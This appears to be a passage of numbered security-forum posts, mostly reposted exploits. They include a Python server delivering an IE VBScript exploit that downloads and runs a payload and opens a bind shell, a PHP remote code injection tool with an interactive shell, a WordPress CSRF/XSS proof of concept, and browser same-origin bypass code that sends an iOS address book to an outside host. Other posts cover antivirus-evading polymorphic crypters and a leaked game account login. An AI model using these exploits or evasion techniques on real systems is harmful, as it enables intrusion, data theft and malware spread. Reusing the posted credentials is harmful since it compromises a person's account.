  11. #!/usr/bin/python import BaseHTTPServer, socket ## # IBM Security AppScan Standard OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 # # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ # if you able to exploit IE then you can exploit appscan and acunetix # This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And # Metasploit windows/shell_bind_tcp Executable Payload # # Usage: # chmod +x appscan.py # ./appscan.py # ... # nc 172.20.10.14 333 # # Video: http://youtu.be/hPs1zQaBLMU ## class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(req): req.send_response(200) if req.path == "/payload.exe": req.send_header('Content-type', 'application/exe') req.end_headers() exe = open("payload.exe", 'rb') req.wfile.write(exe.read()) exe.close() else: req.send_header('Content-type', 'text/html') req.end_headers() req.wfile.write("""Please scan me! <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\ 'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');" shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0 end function dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script>""") if __name__ == '__main__': sclass = BaseHTTPServer.HTTPServer server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) print "Http server started", socket.gethostbyname(socket.gethostname()), 80 try: server.serve_forever() except KeyboardInterrupt: pass server.server_close() Source
  12. 1. Cum sa evitam SQL Injection (SQLi) De obicei acesta este folosit in linkuri de genul: site.tld/script.php?id=1 , adaugand dupa 1 o continuare a comanezii SQL. De exemplu: Code: (Select All) site.com/script.php?id=1 Acesta in cod arata cam asa: Code: (Select All) SELECT camp1,camp2 FROM tabel WHERE id=’1? Insa, putem adauga ceva acelui id, ceea ce va continua comanda noastra SQL: Code: (Select All) site.com/script.php?id=1’OR+id%3D’3? Asta, in codul SQL va arata asa: Code: (Select All) SELECT camp1,camp2 FROM tabel WHERE id=’1? OR id=’3? Bineinteles, acest exemplu nu este daunator, dar daca “hackerul” foloseste DROP sau DELETE, poate iesi urat. Cum se pot securiza acestea ? Simplu ! Aplicam stringului pe care il introducem in baza de date o functie, mysql_real_escape_string(), care inlocuieste toate caracterele care ar putea avea vreun efect asupra comenzii SQL. De exemplu: script.php Code: (Select All) $id = $_GET[‘id’]; $id = mysql_real_escape_string($id); $query = “SELECT camp1,camp2 FROM tabel WHERE id='”. $id .”‘”; Cel mai bine e sa luam toate datele in functie de ID (adica sa nu avem urluri gen useri.php?user=bogdan, ci useri.php?iduser=1) deoarece ID-uri, trebuie sa fie numere, lucru care se poate verifica foarte usor. Deci, datele le vom selecta dupa un anumit ID, care o sa fie numeric. Astfel, scriptul devine simplu: Code: $id = $_GET[‘id’]; if(!is_numeric($id)){ echo ‘ID-ul nu est numeric. Incercare de hacking ?? Politia a fost anuntata'; }else{ //este indicat sa verificati intai daca acel ID se afla in baza de date. folositi mysql_num_rows, iar daca rezultatul este 0, id-ul nu exista in baza de date //ceva de genul: $query = mysql_query(“SELECT camp1,camp2 FROM tabel WHERE id='”. $id .”‘”); if(mysql_num_rows($query)==0) { echo ‘ID-ul nu exista in baza de date. Anunt avocatul'; }else{ //totul e OK, id-ul e validat si exista in BD } } In principiu, pentru a valida un GET folositi urmatoarele 3 functii, in functie de caz: mysql_real_escape_string() – sau alternativa: addslashes() is_numeric() mysql_num_rows()
  13. MasterLight

    .

    .
  14. username: irvin1833 password: are dezactivat guardul dar are activat family code il las la liber sa se joace cine vrea contul este al meu de aceea i-am pus falimy code Enjoy
  15. https://wordpress.org/plugins/yet-another-related-posts-plugin/ Affected Versions <= 4.2.4 Description 'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection which an attacker may exploit via tricking website's administrator to enter a malformed page which will change YARPP options, and since some options allow html the attacker is able to inject malformed javascript code which can lead to *code execution/administrator actions* when the injected code is triggered by an admin user. injected javascript code is triggered on any post page. Vulnerability Scope XSS RCE ( http://research.evex.pw/?vuln=14 ) Authorization Required None Proof of Concept <body onload="document.getElementById('payload_form').submit()" > <form id="payload_form" action="http://wpsite.com/wp-admin/options-general.php?page=yarpp" method="POST" > <input type='hidden' name='recent_number' value='12' > <input type='hidden' name='recent_units' value='month' > <input type='hidden' name='threshold' value='5' > <input type='hidden' name='weight[title]' value='no' > <input type='hidden' name='weight[body]' value='no' > <input type='hidden' name='tax[category]' value='no' > <input type='hidden' name='tax[post_tag]' value='consider' > <input type='hidden' name='auto_display_post_types[post]' value='on' > <input type='hidden' name='auto_display_post_types[/page][page]' value='on' > <input type='hidden' name='auto_display_post_types[attachment]' value='on' > <input type='hidden' name='auto_display_archive' value='true' > <input type='hidden' name='limit' value='1' > <input type='hidden' name='use_template' value='builtin' > <input type='hidden' name='thumbnails_heading' value='Related posts:' > <input type='hidden' name='no_results' value='<script>alert(1);</script>' > <input type='hidden' name='before_related' value='<script>alert(1);</script><li>' > <input type='hidden' name='after_related' value='</li>' > <input type='hidden' name='before_title' value='<script>alert(1);</script><li>' > <input type='hidden' name='after_title' value='</li>' > <input type='hidden' name='show_excerpt' value='true' > <input type='hidden' name='excerpt_length' value='10' > <input type='hidden' name='before_post' value='+<small>' > <input type='hidden' name='after_post' value='</small>' > <input type='hidden' name='order' value='post_date ASC' > <input type='hidden' name='promote_yarpp' value='true' > <input type='hidden' name='rss_display' value='true' > <input type='hidden' name='rss_limit' value='1' > <input type='hidden' name='rss_use_template' value='builtin' > <input type='hidden' name='rss_thumbnails_heading' value='Related posts:' > <input type='hidden' name='rss_no_results' value='No Results' > <input type='hidden' name='rss_before_related' value='<li>' > <input type='hidden' name='rss_after_related' value='</li>' > <input type='hidden' name='rss_before_title' value='<li>' > <input type='hidden' name='rss_after_title' value='</li>' > <input type='hidden' name='rss_show_excerpt' value='true' > <input type='hidden' name='rss_excerpt_length' value='10' > <input type='hidden' name='rss_before_post' value='+<small>' > <input type='hidden' name='rss_after_post' value='</small>' > <input type='hidden' name='rss_order' value='score DESC' > <input type='hidden' name='rss_promote_yarpp' value='true' > <input type='hidden' name='update_yarpp' value='Save Changes' > </form></body> Fix No Fix Available at The Moment. Timeline Notified Vendor - No Reply Notified Vendor Again- No Reply Publish Disclosure @evex_1337 [url]http://research.evex.pw/?vuln=15[/url]Homepage Source
  16. SOP Bypassing in Safari To help you understand better, http://httpsecure.org and file://httpsecure are both treated as a different origin. The Safari browser (IOS and MAC) version 6.0.2 does not enforce the same origin policy when you need to access a local resource. When an attached HTML file tries to open using the file scheme, the JavaScript code contained within can bypass the SOP and start two –way communications with different origins. Consider the following page: <html> <body> <h1> I'm a local file loaded using the file:// scheme </h1> <script> xhr = new XMLHttpRequest(); xhr.onreadystatechange = function (){ if (xhr.readyState == 4) { alert(xhr.responseText); } }; xhr.open("GET", "http://httpsecure.org/docs/safari_sameoriginpolicy_bypassing/other_origin.html"); xhr.send(); </script> </body> </html> Now that the page has loaded the file scheme, the XMLHTTPRequest object is able to read the response after requesting the above mentioned code. SOP Bypassing in Firefox Firefox is the most used browser and the same origin policy bypassing was found by Gareth Heyes in October 2012. The issue found by him is critical and the company decided to fix it and stop its distribution. The issue found in version 16 resulted in unauthorized access to the window.location object outside the constraints of the SOP. The bypassing code is shown below. <!Doctype html> <script> function poc() { var win = window.open('https://httpsecure.org/abc/', 'newWin', 'width=200,height=200'); setTimeout(function(){ alert('Hello '+/^https:\/\/httpsecure.org\/([^/]+)/.exec( win.location)[1]) }, 5000); } </script> <input type=button value="Firefox knows" onclick="poc()"> Execution of the above code from an origin you control will also authenticate into httpsecure on a separate tab of he browser. This loads httpsecure.org/abc and the application redirects to https://httpsecure.org/ <user_uid>/lists (where user_id is your httpsecure handle). After 5 seconds, the exec function will trigger the window.location object to be parsed (here’s the bug, as it shouldn’t be accessible cross-origin) with the regex. This results in the httpsecure handle displayed in the alert box. In August 2012, when Mozilla released its version with support for HTML 5 sandboxed iframes, BRAUN found the issue that, when using allow-script as a value of the iframe sandbox attribute, rogue/fake JavaScript from the iframe content could still access window.top. This would change the outer window.location. <!-- Outer file, bearing the sandbox --> <iframe src="inner.html" sandbox="allow-scripts"></iframe> The framed code was: <!-- Framed document , inner.html --> <script > // escape sandbox: if(top != window) { top.location = window.location; } // all following JavaScript code and markup is unrestricted: // plugins, popups and forms allowed. </script> This code needs to specify with additional code allow-top-navigation, and allows JavaScript code loaded inside an iframe to change the location of window. An attacker could use this to redirect user/victim to a malicious website by hooking the victim of the browser. Note: In HTML5, a new iframe attribute was introduced, called sandbox. The main focus of this new attribute was to have a more granular and secure way to use iframes, with the limited potential harm of third party content embedded from different origins. The sandbox attribute value was set to be zero or the following keywords: allow-forms, allow-popups, allow-same-origin, allow-scripts, allow-top-navigation SOP Bypassing in Opera The same origin policy bypass was found by Heyes. The issue was critical, where Opera was not properly enforcing the same origin policy when overriding prototypes or the constructor of an iframe location object. Let’s take following code example: <html> <body> <iframe id="ifr" src="http://httpsecure.org/xdomain.html"></iframe> <script> var iframe = document.getElementById('ifr'); function do_something(){ var iframe = document.getElementById('ifr'); iframe.contentWindow.location.constructor. prototype. defineGetter__.constructor('[].constructor. prototype.join=function(){console.log("pwned")}')(); } setTimeout("do_something()",3000); </script> </body> </html> Following is the content framed from a different origin: <html> <body> <b>I will be framed from a different origin</b> <script> function do_join(){ [1,2,3].join(); console.log("join() after prototype override: " + [].constructor.prototype.join); } console.log("join() after prototype override: " + [].constructor.prototype.join); setTimeout("do_join();", 5000); </script> </body> </html> In the above mentioned code frame, the console value of constructor.prototype.join is native code used when join() is called on an array. After a few seconds, join() method is called on the [1,2,3] array and the printing function used previously is called again. If you have a deep look back at the above mentioned code, you will see that join() prototype gets overridden inside the do_something() function. Note: Heyes also found SOP bypass by overriding prototypes and using literal values, which were not filtered by Opera before. In the real case scenario, this bypass only works in a frameable web application, so if the application already mitigated vulnerability like CLICKJACKING by frame busting, X-Frame-Option: deny cannot be targeted or consider mitigated. Let’s take an example where the target browser has two tabs open in an Opera browser, where one is a hacked tab and the other is authenticated. If you create an iframe with an src tag in the authenticated origin, you can read the IFRAME content by which you can access any sensitive information. Same Origin Policy Bypassing in Cloud Storage If you think the same origin policy is limited to browsers and their plugins only then, consider this: cloud storage services are also vulnerable to SOP bypass. The same is also found in DROPBOX 1.4.6 on IOS and 2.0.1 on Android, and Google Drive 1.0.1 on IOS. All of these services offer you to store and synchronize files to the cloud. Roi Saltzman found this issue, which is a bit similar to Safari SOP bypass. This bypass relies on the loading of a file in a privileged zone: File://var/mobile/application/app_uuid If an attacker is able to trick the target into loading an HTML file through the client application, the JavaScript code contained in the file will be executed. In this attack, the file is loaded in a privileged zone which allowed JavaScript access to the local file system of the mobile device. FYI: if the HTML file is loaded using the file scheme, nothing prevents JavaScript from accessing another file like: file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb The above mentioned link database contains the user’s address book on IOS. In this, if the target application denies file access outside of the application scope, you can still retrieve the cached file. In this attack, if the user accesses this malicious link, the contents of the user address book will be sent to httpsecure.org. <html> <body> <script> local_xhr = new XMLHttpRequest(); local_xhr.open("GET", "file:///var/mobile/Library/AddressBook/ 150 Chapter 4 ? Bypassing the Same Origin Policy AddressBook.sqlitedb"); local_xhr.send(); local_xhr.onreadystatechange = function () { if (local_xhr.readyState == 4) { remote_xhr = new XMLHttpRequest(); remote_xhr.onreadystatechange = function () {}; remote_xhr.open("GET", "http://httpsecure.org/?f=" + encodeURI(local_xhr.responseText)); remote_xhr.send(); } } </script> </body> </html> Same Origin Policy Bypassing in Cross-Origin Resource Sharing (CORS) CORS is also vulnerable to the same origin policy bypass. CORS has misconfiguration of Access-Control-Allow-Origin: * The above mentioned code is a potential misconfiguration. Research says that more than one million applications misconfigured the Access-Control-Allow-Origin header. This allows any application on the Internet to submit a cross origin request to the site and read the response. The wild card value for the Access-Control-Allow-origin is not so insecure, if a permissive policy is used to provide content that does not contain sensitive information. Source
  17. Document Title: =============== PayPal Inc Bug Bounty #114 - JDWP Remote Code Execution Vulnerability References (Source): ==================== [url]http://www.vulnerability-lab.com/get_content.php?id=1474[/url] Video: [url]http://www.vulnerability-lab.com/get_content.php?id=1474[/url] Vulnerability Magazine: [url=http://magazine.vulnerability-db.com/?q=articles/2015/04/28/paypal-inc-bug-bounty-jdwp-remote-code-execution-vulnerability]PayPal Inc Bug Bounty - JDWP Remote Code Execution Vulnerability | VULNERABILITY MAGAZINE - Bug Bounties, Acknoweldgements & Security Research[/url] Release Date: ============= 2015-04-28 Vulnerability Laboratory ID (VL-ID): ==================================== 1474 Common Vulnerability Scoring System: ==================================== 9.3 Product & Service Introduction: =============================== PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. (Copy of the Homepage: [url=http://www.paypal.com]Send Money, Pay Online or Set Up a Merchant Account - PayPal[/url]) [[url=http://en.wikipedia.org/wiki/PayPal]]Bad title - Wikipedia, the free encyclopedia[/url] Abstract Advisory Information: ============================== An independent Vulnerability Laboratory Researcher discovered a remote code execution vulnerability in the official PayPal Inc Marketing online-service web-application. Vulnerability Disclosure Timeline: ================================== 2015-04-05: Researcher Notification & Coordination (Milan A Solanki - Safehacking4mas) 2015-04-06: Vendor Notification (PayPal Inc - Security & Bug Bounty Team) 2015-04-07: Vendor Response/Feedback (PayPal Inc - Security & Bug Bounty Team) 2015-04-09: Vendor Fix/Patch (PayPal Inc - Developer Team) 2015-04-28: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== PayPal Inc Product: Marketing Application & Service (HK) 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A remote code execution vulnerability has been discovered in the JDWP protocol of the PayPal Inc Marketing online service web-server. The vulnerability allows remote attackers to execute system specific code against a target system to compromise the webserver. The Java Debug Wire Protocol (JDWP) is the protocol used for communication between a debugger and the Java virtual machine (VM) which it debugs (hereafter called the target VM). JDWP is one layer within the Java Platform Debugger Architecture (JPDA). JDWP does not use any authentication and could be abused by an attacker to execute arbitrary code on the affected server. The tool that i used to disclose is the jdwp-shellifier. I scanned the marketing site and it had opened port 8000 (pre-auth) than i just executed after accepted connection my commands and finally disclosed a remote code execution issue. Vulnerable Protocol(s): [+] JDWP Port(s): [+] 8000 Proof of Concept (PoC): ======================= The remote code execution web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the security vulnerability ... 1. Scan the site with the jdwp-shellifier tool ([url]https://github.com/IOActive/jdwp-shellifier[/url]) 2. Open port 8000 and connect to the service without auth 3. Execute own server-side commands as root user 4. Successful reproduce of the vulnerability! Note: Please watch the poc demo video! Solution - Fix & Patch: ======================= 2015-04-09: Vendor Fix/Patch (PayPal Inc - Developer Team) Security Risk: ============== The security risk of the remote code execution vulnerability in the jdwp protocol is estimated as critical. (CVSS 9.3) Credits & Authors: ================== Milan A Solanki - (milans812@gmail.com) [[url]www.safehacking4mas.blogspot.in][/url] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: [url]www.vulnerability-lab.com[/url] - [url]www.vuln-lab.com[/url] - [url]www.evolution-sec.com[/url] Contact: [email]admin@vulnerability-lab.com[/email] - [email]research@vulnerability-lab.com[/email] - [email]admin@evolution-sec.com[/email] Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or [email]research@vulnerability-lab.com[/email]) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: [url]www.vulnerability-lab.com[/url] CONTACT: [email]research@vulnerability-lab.com[/email] PGP KEY: [url]http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt[/url] Source: http://dl.packetstormsecurity.net/1504-exploits/VL-1474.txt
  18. <?php /* OutPut: #[+] Author: TUNISIAN CYBER #[+] Script coded BY: Egidio Romano aka EgiX #[+] Title: Open-Letters Remote PHP Code Injection Vulnerability #[+] Date: 19-04-2015 #[+] Vendor: http://www.open-letters.de/ #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] CVE: #[+] Twitter: @TCYB3R #[+] Egix's Contact: n0b0d13s[at]gmail[dot]com #[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png OL-shell> */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[-] No response from {$host}:80\n"); fwrite($sock, $packet); return stream_get_contents($sock); } print "#[+] Author: TUNISIAN CYBER\n"; print "#[+] Script coded BY: Egidio Romano aka EgiX\n"; print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n"; print "#[+] Date: 19-04-2015\n"; print "#[+] Vendor: http://www.open-letters.de/\n"; print "#[+] Type: WebAPP\n"; print "#[+] Tested on: KaliLinux (Debian)\n"; print "#[+] CVE:\n"; print "#[+] Twitter: @TCYB3R\n"; print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n"; print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /zenphoto/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $exploit = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($exploit)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$exploit}"; http_send($host, $packet); $packet = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nOL-shell> "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?> Source: http://packetstorm.wowhacker.com/1504-exploits/openletters-inject.txt
  19. Before we start it's probably best to explain some things: Signature - A pattern of bytes used by an antivirus to identify malicious executables, this could be a string, parts of a function, or a hash. Crypting - This is the most common way of evading antivirus detections, it works by encrypting the malicious executable so the antivirus cannot match the malicious code to existing signatures. Payload - The malicious executable which is encrypted to evade detections, this is attached to the stub in some way (stored as a resource, added after then end of file, appended to a new or existing section). Stub - A simple program responsible for decrypting the payload and executing it in memory. Due to the payload being encrypted, antiviruses will attempt to generate signatures to match the stub's code, but because the stub is small and simple it can be easily modified to evade existing signatures. Polymorphism Polymorphism is a solution to a problem mainly found with worms/botnet: When an AV adds a new signature that detects the malicious executable, the infected file will be quarantined, leaving the malware running in memory until reboot. If a botmaster is running a botnet with thousands of bots, each time the stub is detected he's likely to lose a few hundred bots, his only choice: To keep updating the bots with a new stub before the previous one is detected (which for large botnets can be every few hours), leaving the hacker with very little free time. A solution to this would be to write malware capable of programmatically generating a unique stub and replacing the old one on execution, resulting in each computer having a different stub; this is know as polymorphism. there's a few ways to programmatically create unique code that performs the same function as the previous. Block Mutation A lot of assembly instructions can be freely movable, whilst some cannot. An instruction using a relative address (such as a jump or call), when moved will point to a different location, breaking the code; freely movable instructions such as those using absolute addresses or only registers can be moved anywhere. Block based polymoprphism works by breaking the code down into small blocks, which are then numbered; the number specifies the order in which they execute and the block is either marked as movable or immovable based on its containing instruction. The mutation engine can then reorder, relocate, or separate the movable block; using jumps or similar instructions to link them together so that they execute in the correct order. Junk code (random instructions which are never actually executed) can also be added between blocks to add more entropy and change the executable size. Register Swapping It's possible to write the code in such a way that registers can easily be switched out, for instance all occurrences of edx within a function could be replaced with ecx, changing a lot of bytes within the application. The only problem with this approach is there's only a few usable registers, making it easy to exhaust all possible combinations, and it's still possible to generate signatures based on the layout of the instructions. Internal Assembler + Intermediate Language A very effective approach is to embed an assembler within the payload, as well as create an intermediate language (IL) which the polymorphic engine uses to create ASM on the fly. A simple example would be the following IL code. pmov Reg1, 5 add eax, Reg1 In this example instructions prefixed with p will be mutated at an instruction level, whilst those without a prefix will just be assigned a register and compiled as ASM. The IL engine would then use a seed to randomly generate the p-prefixed instructions by picking an instruction, or group of instructions, to perform the operation, as well as assign a register to Reg1 and Reg2. The array of instructions to handle pmov would look something like this: push val pop reg mov reg, val xor reg, reg add reg, val Once the engine has picked which instruction it wishes to use, it would then fill in the register and value, then compile it to ASM. Here are some examples of final outputs. push 5 pop edx add eax, edx mov ecx, 5 add eax, ecx xor ebx, ebx add ebx, 5 add eax, ebx By using an IL, we avoid having to first disassemble the stub code before mutating it. Metamorphism Today advanced metamorphic malware which can efficiently evade signature detection is nearly impossible, but back in the days of DOS / 95 / 98 viruses, it has been achieved multiple times. The idea of metamorphism is to take polymorphism a step further and instead of encrypting the malicious executable and mutating the stub, the entire malicious executable is mutated, including the code required to perform the mutation. Malware that is required to create a new, unique copy of itself on every propagation is also required to disassemble previously mutated code and regulate size (because instructions can be mutated into multiple instructions, it's important to be able to do the opposite or the executable grows almost exponentially with every mutation). Due to the amount of consideration and effort that would have to go into creating modern metamorphic malware, most programmers opt to use polymorphism instead, as this allows them to generate output from a temporary representation. A simple mistake during disassembling could result in the executable ceasing to work, and it's a lot harder to debug and test metamorphism in large applications. Source
  20. With the increasing use of smartphones, QR codes are becoming popular. Recently, WhatsApp launched its web version, which needs QR code scanning to access the web version of WhatsApp. So, many people now know what QR code is, but still more are unaware. It is very similar to a bar code we see in products, but it does not need a different reader. Our smartphone camera can easily read it with the help of a QR code scanner app. Due to fast readability, it is now widely accepted. And the use of QR codes is increasing. With the scan of a QR code, we can perform various tasks which would otherwise need a lot more effort. For example, scan a QR code and save the business card details in your smartphone. This is why people like to use QR code scanning for general tasks. But most users are not aware that QR codes can also be malicious. This is why scammers are now using malicious QR codes for tricking users. In this article, I will discuss QR codes in details. I will also try to cover all the potential security issues related to QR codes. QR Codes QR code (or Quick Response code) is a matrix bar code which can be read by an imaging device (camera) and then processed to read its data. It was initially developed for the automotive industry in Japan, but now it is being used by many companies. You will be surprised to know that the QR code was invented back in 1994 by Denso Wave. Nowadays QR codes are being used to display text to users, to save a vCard contact information to the user’s smartphone, to open a website URL, to code payments, for website login (ex: WhatsApp web login) or to compose an e-mail or text message just by scanning a QR code. QR codes are really useful and help us to complete tasks faster in smartphones. You can quickly open a website just by scanning a QR code and you do not need to manually type the URL in your smartphone. This is why many websites’ poster ads now contain QR code. Another popular use is on a business card. Now people also include QR code in their business cards. So, other persons can simply scan the QR code to save the contact details in their smartphone. See the sample QR code below. This is for opening a website. QR code for: IT Security Training & Resources by InfoSec Institute Scanning the above QR code will open IT Security Training & Resources by InfoSec Institute. How to Generate QR Codes There are various tools available for this. If you want to generate a QR code with specific information, you can use these tools, which let you create QR code for URL, text, vCard, SMS, call, geo-location, event, email and login. Different tools have different abilities. A few good QR code generator tools are: https://www.the-qrcode-generator.com/ QR Code Generator – create QR codes for free (Logo, T-Shirt, vCard, EPS) QR Code Generator - Create QR codes here http://www.qrstuff.com/ https://scan.me/qr-code-generator You can use any of the above tools to generate your own QR code. Lifespan of QR codes This is a question about QR code people generally ask. QR code does not need any platform for redirection, but it has data within it. Once a QR code is generated, it can be used anytime, anywhere. The lifespan of the QR codes is unlimited, so you do not need to worry about lifespan. Generate and then use. Can QR codes be hacked? A QR code is the square matrix with small black square dots arrangement. Hacking a QR code means manipulation of the action without modifying the QR code. This is not possible. QR codes can be malicious and can trigger malicious action. But that QR code will not be the same as the legitimate QR code. Two QR codes with different actions will never be the same. You will certainly see different patterns in both QR codes. So, QR codes cannot be hacked. But It can be malicious and hackers can use a QR code for various malicious purposes. And there are various reports in which we have seen the malicious acts. Security Risks Involved with Use of QR Codes As I already discussed, QR codes can be malicious. So, there are various security risks involved with QR codes. In this section, I will discuss all the security risks involved with QR codes. Phishing Phishing is a popular way of 